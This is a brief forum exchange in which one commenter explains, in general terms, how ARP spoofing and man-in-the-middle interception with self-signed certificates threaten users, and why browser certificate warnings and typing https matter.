so... how about browsers warn when they're pulling a an address off a DNS they've never heard of, and that isn't listed and isn't verified? Wouldn't that be a much saner way of dealing with the problem?
DNS has nothing to do with it. They can arp-spoof your machine into thinking their machine is the gateway. Then all your traffic goes through their machine. If you don't verify certificates, then they could just present you a self-signed cert that they used to decrypt your requests, then re-encrypt them and forward to the real site. If your browser didn't warn you, you'd never know.
Seriously, watch the video. Even though your browser warns you, you're still very vulnerable. If you just type bankofamerica.com, anybody on your network could easily trick you in to divulging your password. You have to type the "https" in yourself and trust that your browser verifies certificates correctly.
